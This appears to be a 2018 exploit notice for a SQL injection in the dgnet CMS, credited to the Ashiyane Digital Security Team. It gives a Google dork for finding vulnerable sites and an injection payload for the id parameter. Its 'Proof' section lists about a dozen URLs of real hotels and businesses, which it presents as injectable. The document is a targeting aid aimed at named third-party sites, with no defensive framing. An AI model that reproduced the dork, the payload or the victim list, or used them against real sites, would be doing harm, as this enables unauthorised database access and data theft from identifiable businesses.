|=============================================================| |-------------------In The Name Of God------------------------| | | Exploit Title: dgnet cms SQL Injection | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage:http://www.dgnet.it | | Google Dork : intext:"dgNet webDesign" & inurl:/.php?id= | | Tested on: Windows 10 ~~~> Google Chrome | | vulnerable path : /*.php ? id = [SQL Injection] | | Date: Wednesday - 2018 04 April |==============================================| | Discreaption : | | If you need a bypass, you can use the String method like this : | id=1' order by 999-- - |==============================================| | Proof : | | http://www.style-brokers.com/en-details.php?id=1282 | | http://www.relaistrevi95.com/en-offers-details.php?id=16 | | http://www.villafabbroni.com/td/angebote-detail.php?id=7 | | http://www.hotelriparoma.com/en/hotel-downtown-rome/offer-details.php?id=81 | | http://www.hotelilnegresco.com/zh/territorio-dettaglio.php?id=55 | | http://www.granduomo.com/en/offerte-speciali-dettaglio.php?id=19 | | http://www.floraliadecor.it/en/storie-dettaglio.php?id=11 | | http://www.capritiberiopalace.it/en-special-offers-details.php?id=33 | | http://www.poiano.com/en/spa_detail.php?id=29 | | http://www.granduomo.com/en/offerte-speciali-dettaglio.php?id=19 | | http://www.anticatorre.com/eng-news-dettaglio.php?id=13 | | http://www.ilselvino.com/en/offerta-dettaglio.php?id=142 | | http://www.ttpartnersimmobiliare.com/ing-stampaDettaglio.php?id=3021 | |============================================================= | Discovered By : sir shahroukh |=============================================================